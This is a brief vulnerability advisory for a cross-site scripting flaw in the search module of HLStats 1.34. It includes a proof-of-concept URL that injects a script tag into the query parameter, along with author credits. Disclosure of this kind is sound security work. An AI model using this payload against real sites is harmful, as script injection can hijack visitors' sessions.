HLStats version 1.34 suffers from a cross site scripting vulnerability.
455aa23a71043522ef1c47661a0229f7Cross-site Scripting Vulnerability in HLStats 1.34
hlstats.php?mode=search&game=cstrike&st=player&q=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E%22
Search module fails to sanitize quotes.
kefka
kefka@kevinbeardsucks.com
Thanks to RSnake
Comments
No comments yet, be the first!